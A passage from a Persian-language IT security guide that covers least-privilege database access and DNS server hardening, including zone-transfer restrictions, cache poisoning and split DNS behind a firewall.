‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﻣﻮﺭﺩ ﺣﻔﺎﻇﺖ ﻓﻴﺰﻳﻜﻲ ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪ ،‬ﺍﺯ ﺁﻥ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻣﻲﺷﻮﺩ‪ ،‬ﻭ ﻣـﺸﺎﺑﻪ‬ ‫•‬
‫ﺳﺎﻳﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺍﻳﻤﻦ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪.‬‬
‫ﻞ ﺣـﺪﺍﻗﻞ ﺩﺳﺘﺮﺳـﻲ ﺭﺍ‬ ‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺧﻮﺩ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﻧﻴﺰ ﺿﺮﻭﺭﻱ ﺍﺳﺖ‪ .‬ﻫﻨﮕﺎﻡ ﺗﻌﺮﻳﻒ ﻛﺎﺭﺑﺮﺍﻥ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﻭ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﺁﻧﻬﺎ ﺍﺻـ ﹺ‬
‫ﺭﻋﺎﻳﺖ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ‪ CGI‬ﻓﻘﻂ ﺑﻪ ﺩﺳﺘﺮﺳﻲ ﺧﻮﺍﻧﺪﻥ ﺍﺯ ﺗﻨﻬﺎ ﻳﻚ ﺟﺪﻭﻝ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﻧﻴﺎﺯ ﺩﺍﺭﺩ‪ ،‬ﻳـﻚ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ ﺑـﺎ‬
‫ﺩﺳﺘﺮﺳﻲ ﻣﺤﺪﻭﺩﺷﺪﻩ ﺑﻪ ﺁﻧﭽﻪ ﻧﻴﺎﺯ ﺍﺳﺖ ﺗﻌﺮﻳﻒ ﻛﻨﻴﺪ ﻭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺁﻥ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﻣﺘﺼﻞ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺑﺮﺧـﻲ‬
‫ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻴﺪ ﻣﺠﻮﺯﻫﺎﻱ ﺑﺴﻴﺎﺭ ﺟﺰﺋﻲ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺪﻫﻴﺪ‪ .‬ﺩﺭ ﺑﻌـﻀﻲ ﻣـﻮﺍﺭﺩ ﺣﺘـﻲ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﺘﻮﻧﻬﺎ ﻭ ﻳﺎ ﺳﻄﺮﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮﺗﺎﻥ ﺩﺭ ﻳﻚ ﺟﺪﻭﻝ ﺭﺍ ﺑﺮﺍﻱ ﻳﻚ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ‪ ،‬ﻣﺠﺎﺯ ﻳﺎ ﻏﻴﺮﻣﺠﺎﺯ ﺑﺪﺍﻧﻴﺪ‪ ،‬ﻳـﺎ ﺑـﺮ‬
‫ﺣﺴﺐ ﻣﺤﻞ ﻳﺎ ﻧﺤﻮﺓ ﺍﺗﺼﺎﻝ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ‪ ،‬ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺗﻌﺮﻳﻒ ﻛﻨﻴﺪ‪ .‬ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺣﻔﺎﻇﺘﻲ‬
‫ﺑﻬﺮﻩ ﺑﺒﺮﻳﺪ‪.‬‬

‫ﺍﻳﻤﻦﺳﺎﺯﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻧﺎﻡ‬


‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺮﺍﻱ ﺗﺒﺪﻳﻞ ﺩﻗﻴﻖ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺑﻪ ﺁﺩﺭﺱ ‪) IP‬ﻭ ﺁﺩﺭﺱ ‪ IP‬ﺑﻪ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﻭ ﻧﻴﺰ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺑﻪ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ( ﺳﺎﻳﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫـﺎﻱ ﺭﻭﻱ‬
‫ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻧﺎﻡ ﺩﺍﻣﻨﻪ )‪DNS‬ﻫـﺎﻱ( ﺧﻮﺩ ﻣﺘﻜﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻫﺮ ﺩﺍﻣﻨﻪ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎﻳـﺪ ﻳـﻚ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬
‫ﻣﻌﺘﺒﺮ ﻧﺎﻡ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻭ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﻛﻪ ﺑﺮﺍﻱ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺑﻮﺩﻥ ﺍﻳﻦ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻧﺎﻡ‪ ،‬ﺁﺩﺭﺱ ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﻋﻤﻮﻣﻲ ﺑﺎﺷﺪ‪DNS ،‬ﻫﺎ‬
‫ﺐ ﺣﻤﻠﻪ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻢ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺩﺭ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺧـﻮﺩ ﺍﺯ ﻧـﺎﻡ‬ ‫ﻳﻚ ﻧﻘﻄﺔ ﻣﻨﺎﺳ ﹺ‬
‫‪٣٧٣‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻣﻴﺰﺑﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﻟﺬﺍ ﻣﻬﺎﺟﻤﻲ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﻛﻨﺘﺮﻝ ‪ DNS‬ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺧﻮﺩ ﺩﺭﺁﻭﺭﺩ ﻭ ﻳﺎ ﻣﺤﺘﻮﻳﺎﺕ ﺁﻧﺮﺍ ﻣﺨـﺪﻭﺵ ﻧﻤﺎﻳـﺪ‪ ،‬ﻣﻌﻤـﻮ ﹰ‬
‫ﻻ‬
‫ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧﺴﺖ ﺍﺯ ﺁﻥ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﮔﺎﻡ ﻣﺆﺛﺮ ﺟﻬﺖ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪.‬‬
‫ﺑﺠﺰ ﺗﺒﺪﻳﻞ ﻧﺎﻣﻬﺎﻱ ﺍﻧﻔﺮﺍﺩﻱ ﻣﻴﺰﺑﺎﻧﻬﺎ‪ DNS ،‬ﻫﻤﭽﻨﻴﻦ ﺳﻴﺴﺘﻤﻲ ﺑﺮﺍﻱ ‪ download‬ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺗﻤﺎﻡ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ‬
‫ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﺍﻧﺘﻘﺎﻝ ﻧﺎﺣﻴﻪ‪ ٢٣٤‬ﻧﺎﻡ ﺩﺍﺭﺩ ﻭ ﻫﻤﺎﻥ ﻓﺮﺁﻳﻨﺪﻱ ﺍﺳﺖ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺛﺎﻧﻮﻳﻪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺗـﺎ ﻳـﻚ‬
‫ﻧﺴﺨﻪ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﻧﺪ‪.‬‬
‫ﭘﺮﻭﺗﻜﻞ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ‪ DNS‬ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ‪ UDP‬ﺑﺎﺷﺪ ﻭ ﻫﻢ ‪ .TCP‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ‪ UDP‬ﻳﻚ ﭘﺮﻭﺗﻜﻞ ﺳﺮﻳﻊ ﻭ ﻣﺒﺘﻨﻲ ﺑﺮ ﺑـﺴﺘﻪﻫـﺎﻱ‬
‫ﻻ ﺑﺮﺍﻱ ﻓﺮﺁﻳﻨﺪ ﻭﺍﻗﻌﻲ ﺗﺒﺪﻳﻞ ﻧﺎﻡ ﻣﻴﺰﺑـﺎﻥ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﻣﻴﺰﺍﻥ ﻣﺤﺪﻭﺩﻱ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺍﻧﺘﻘﺎﻝ ﻣﻲﺩﻫﺪ‪ ،‬ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻲﮔﻴﺮﺩ‪ .‬ﺳﻴﺴﺘﻢ ‪ TCP‬ﻧﻴﺰ ﻏﺎﻟﺒﹰﺎ ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﻪ ﺗﺒﺎﺩﻝ ﺩﺍﺩﻩﻫﺎﻱ ﺯﻳﺎﺩ‪ ،‬ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﭘﺎﻳﺪﺍﺭ ﻧﻴـﺎﺯ ﺩﺍﺭﻧـﺪ ‪ -‬ﻛـﻪ‬
‫ﻫﻤﺎﻥ ﺍﻧﺘﻘﺎﻟﻬﺎﻱ ﻧﺎﺣﻴﻪ ﻣﻲﺑﺎﺷﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ‪query ،‬ﻫﺎﻱ ﻣﻨﻔﺮﺩ ﻫﻢ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ‪ TCP‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪.‬‬

‫ﺍﻧﺘﻘﺎﻟﻬﺎﻱ ﻧﺎﺣﻴﻪ ﺩﺭ ‪DNS‬‬

‫ﺍﻧﺘﻘﺎﻝ ﻧﺎﺣﻴﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻣﺨﺎﻃﺮﺓ ﺍﻣﻨﻴﺘﻲ ﻣﺤﺴﻮﺏ ﺷﻮﺩ‪ ،‬ﭼﺮﺍﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻓﻬﺮﺳﺖ ﻛﺎﻣﻠﻲ ﺍﺯ ﻫﻤﺔ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﺘﺼﻞ ﺑـﻪ ﺷـﺒﻜﺔ ﺩﺍﺧﻠـﻲ‬
‫ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﺑﻪ ﻳﻚ ﻛﺎﺭﺑﺮ ﺧﺎﺭﺟﻲ ﺍﺭﺍﺋﻪ ﻛﻨﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎ ﺑﻪ ﺑﺴﺘﻪﻫﺎﻱ ‪ DNS‬ﻛﻪ ﺍﺯ ﭘﺮﻭﺗﻜﻞ ‪ UDP‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺍﺟﺎﺯﺓ ﻋﺒـﻮﺭ‬
‫ﺍﺯ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻭ ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﺭﺍ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺍﻣﺎ ﺻﺮﻳﺤﹰﺎ ﺍﻧﺘﻘﺎﻝ ﻧﺎﺣﻴﻪ ‪ DNS‬ﻛﻪ ﻣﻨﺒﻊ ﺁﻥ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺧﺎﺭﺟﻲ ﺑﺎﺷﺪ ﺭﺍ ﻣﺴﺪﻭﺩ ﻣﻲﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺍﻳﻦ ﻃﺮﺍﺣﻲ‪ ،‬ﺍﻧﺘﺨﺎﺑﻲ ﻣﻴﺎﻥ ﺍﻳﻤﻨﻲ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺳﺖ؛ ﭼﻮﻥ ﺩﺭ ﺁﻥ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﺭﺟﻲ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ ﺁﺩﺭﺱ ‪ IP‬ﻫﺮ ﺭﺍﻳﺎﻧﺔ ﺩﺍﺧﻠـﻲ ﺭﺍ‬
‫ﺑﻴﺎﺑﻨﺪ‪ ،‬ﺍﻣﺎ ﺗﻨﻬﺎ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻧﺎﻡ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺍﺯ ﻗﺒﻞ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻣﺴﻴﺮﻳﺎﺏ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺑﺴﺘﻪﻫﺎ ﺭﺍ ﺑﺎ ﻣﺴﺪﻭﺩ ﻛﺮﺩﻥ ﺍﺗﺼﺎﻻﺕ ‪ TCP‬ﺭﻭﻱ ﭘﻮﺭﺕ ‪ ۵۳‬ﻏﺮﺑﺎﻝ ﻛﻨﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺟﻠﻮﻱ ﺍﻧﺘﻘﺎﻟﻬﺎﻱ‬
‫ﻝ ﺑﻪ ﻧﺎﻡ "‪ "allow-transfers‬ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﺪﻩ ﻛﻪ ﺷـﻤﺎ‬ ‫ﻧﺎﺣﻴﻪ ﺭﺍ ﺑﮕﻴﺮﻳﺪ‪ ٢٣٥.‬ﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ﺟﺪﻳﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎ ﹺﻡ ‪ ،BIND‬ﻳﻚ ﺭﻭﺍ ﹺ‬
‫ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﺪ ﺑﺘﻮﺍﻧﻴﺪ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﻣﻴﺰﺑﺎﻧﻬﺎﻳﻲ ﻛﻪ ﻣﺠﺎﺯ ﺑﻪ ﺍﻧﺘﻘﺎﻝ ﻧﺎﺣﻴﻪ ﻫﺴﺘﻨﺪ ﺭﺍ ﻣﺸﺨﺺ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﻫﻨﮕﺎﻣﻲ ﺑﻜﺎﺭ ﻣﻲﺁﻳﺪ ﻛﻪ‬
‫ﺑﺨﻮﺍﻫﻴﺪ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺛﺎﻧﻮﻳﻪ ﻛﻪ ﺩﺭﻭﻥ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﻧﻴﺴﺘﻨﺪ ﻣﺠﻮﺯ ﺍﻧﺘﻘﺎﻝ ﺩﺍﻣﻨﻪ ﺑﺪﻫﻴـﺪ‪ ،‬ﺍﻣـﺎ ﻧﻤـﻲﺧﻮﺍﻫﻴـﺪ ﺳـﺎﻳﺮﻳﻦ ﺍﺯ ﭼﻨـﻴﻦ‬
‫ﻗﺎﺑﻠﻴﺘﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﻨﺪ‪.‬‬

‫ﺣﻤﻼﺕ ﻧﺎﻡ ﺩﺍﻣﻨﺔ ‪DNS‬‬

‫ﺳﻪ ﺭﺍﻩ ﻋﻤﺪﻩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻬﺎﺟﻢ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻛﺎﺭﻱ ﻛﻨﺪ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﻧﺎﺻﺤﻴﺢ ﺍﺭﺍﺋﻪ ﻛﻨﺪ‪:‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺑﺎﺭﮔﺬﺍﺭﻱ ﺍﻃﻼﻋﺎﺕ ﮔﻤﺮﺍﻩﻛﻨﻨﺪﻩ‬


‫ﺍﻃﻼﻋﺎﺕ ﻧﺎﺩﺭﺳﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺭﻭﻱ ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺷﺒﻜﻪ ﺑﺎﺭﮔﺬﺍﺭﻱ ﺷﺪﻩ ﻭ ﺑﺎﻋﺚ ﺷﻮﺩ ﻛﻪ ﻳﻚ ‪ query‬ﭘﺎﺳﺨﻲ ﻧﺎﺻﺤﻴﺢ‬
‫ﻻ ﺑﻪ ﺁﻟﻮﺩﻩﻛﺮﺩﻥ ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ‪ ٢٣٦‬ﺷﻬﺮﺕ ﺩﺍﺭﺩ‪ .‬ﺍﮔﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺷﻤﺎ ﺑﺎ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻴﺮﻭﻧـﻲ ﻫـﻢ ﺩﺭ‬ ‫ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺗﻤﺎﺱ ﺍﺳﺖ‪ ،‬ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻬﺎﺟﻤـﺎﻥ ﺑﺘﻮﺍﻧﻨـﺪ ﺑـﺎ ﺑﻬـﺮﻩﺑـﺮﺩﺍﺭﻱ ﺍﺯ ﻳـﻚ ﻧﻘـﺺ ﺑﺮﻧﺎﻣـﻪﺍﻱ ﻭ ﻳـﺎ ﺍﺷـﻜﺎﻝ ﭘﻴﻜﺮﺑﻨـﺪﻱ‪ ،‬ﺭﻭﻱ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺷﻤﺎ ﺍﻃﻼﻋﺎﺕ ﮔﻤﺮﺍﻩﻛﻨﻨﺪﻩ ﺑﺎﺭﮔﺬﺍﺭﻱ ﻛﻨﻨﺪ‪ .‬ﺑﻬﺘﺮﻳﻦ ﺭﻭﺵ ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﻳﻦ ﻗﺒﻴﻞ ﺣﻤﻼﺕ‪،‬‬
‫ﺟﺪﺍﺳﺎﺯﻱ ﺁﻥ ﺍﺯ ﺷﺒﻜﺔ ﺧﺎﺭﺟﻲ ﺍﺳﺖ‪ ،‬ﺗﺎ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﺍﺭﺗﺒﺎﻃﻲ ﺑﺮﻗﺮﺍﺭ ﻧﺸﻮﺩ‪ .‬ﺍﮔﺮ ﺍﺯ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻴـﺪ‪ ،‬ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺍﻳـﻦ‬
‫ﺟﺪﺍﺳﺎﺯﻱ ﺭﺍ ﺑﺎ ﺍﺟﺮﺍﻱ ﺩﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪ :‬ﻳﻜﻲ ﺩﺭ ﺟﻠﻮﻱ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‪ ،‬ﻭ ﺩﻳﮕﺮﻱ ﺩﺭ ﭘﺸﺖ ﺁﻥ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻣﻲ ﻛـﻪ‬
‫ﺟﻠﻮﻱ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﺗﻨﻬﺎ ﺣﺎﻭﻱ ﻧﺎﻣﻬﺎ ﻭ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﺭﺍﻳﺎﻧﺔ ﺩﺭﻭﺍﺯﺓ ﺷﻤﺎ ﺍﺳﺖ؛ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻣﻲ ﻛﻪ ﭘـﺸﺖ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ‬
‫ﺍﺳﺖ ﺣﺎﻭﻱ ﻧﺎﻣﻬﺎ ﻭ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﺗﻤﺎﻡ ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺩﺍﺧﻠﻲ ﺷﻤﺎ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺍﻳﻦ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺭﺍ ﺑﻪ ﺟﺪﺍﻭﻝ ﻣﺴﻴﺮﻳﺎﺑﻲ ﺍﻳﺴﺘﺎ ﻧﻴـﺰ ﻣﺠﻬـﺰ‬

‫‪234 Zone Transfer‬‬


‫‪ ۲۳۵‬ﺩﺭ ﻣﻮﺍﺭﺩ ﺑﺴﻴﺎﺭ ﻧﺎﺩﺭ‪ ،‬ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻨﺠﺮ ﺑﻪ ﻣﺴﺪﻭﺩ ﺷﺪﻥ ‪query‬ﻫﺎﻱ ‪ DNS‬ﻛﻪ ﻣﺠﺎﺯ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ TCP‬ﻫﺴﺘﻨﺪ ﻧﻴﺰ ﺑﺸﻮﺩ‪.‬‬
‫‪236 Cache Poisoning‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٧٤‬‬

‫ﻧﻤﺎﻳﻴﺪ ﺍﻃﻼﻋﺎﺕ ﻣﺨﺮﺏ ﺍﻣﻜﺎﻥ ﺭﺍﻩﻳﺎﻓﺘﻦ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﺪﻩﻫﺎﻱ ﻧﺎﻡ ﺭﺍ ﭘﻴﺪﺍ ﻧﺨﻮﺍﻫﻨﺪ ﻛﺮﺩ‪) .‬ﺍﻟﺒﺘﻪ ﻣﻄﻤﺌﻨﹰﺎ ﺑﺴﺘﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﺷﻤﺎ ﭼﮕﻮﻧـﻪ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ‬
‫ﺧﻮﺩ ﺭﺍ ﺳﺎﺧﺘﻪ ﻭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﺮﺩﻩﺍﻳﺪ ﻭ ﺍﻳﻨﻜﻪ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺟﺎﺯﺓ ﺍﻧﺠﺎﻡ ﭼﻪ ﻛﺎﺭﻫﺎﻳﻲ ﺭﻭﻱ ﺷﺒﻜﻪ ﺩﺍﺩﻩﺍﻳﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ ﺭﺍﻩﺣﻞ ﭼﻨﺪﺍﻥ ﺑﺮﺍﻱ ﺷﻤﺎ ﻛﺎﺭﮔﺸﺎ ﻧﺒﺎﺷﺪ!(‬

‫ﺗﻐﻴﻴﺮ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ‬


‫ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺭﺍ ﺭﻭﻱ ﻣﻴﺰﺑﺎﻥ ﺁﻥ ﺗﻐﻴﻴﺮ ﺩﻫﺪ‪ .‬ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ‪ ،‬ﻣﻬـﺎﺟﻢ ﺑﺎﻳـﺪ ﺑـﻪ‬
‫ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺭﻭﻱ ﺁﻥ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﺍﺳﺖ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ ﻭ ﻗﺎﺩﺭ ﺑﺎﺷﺪ ﻓﺎﻳﻠﻬﺎﻱ ﺁﻧﺮﺍ ﺩﺳـﺘﻜﺎﺭﻱ ﻧﻤﺎﻳـﺪ‪.‬‬
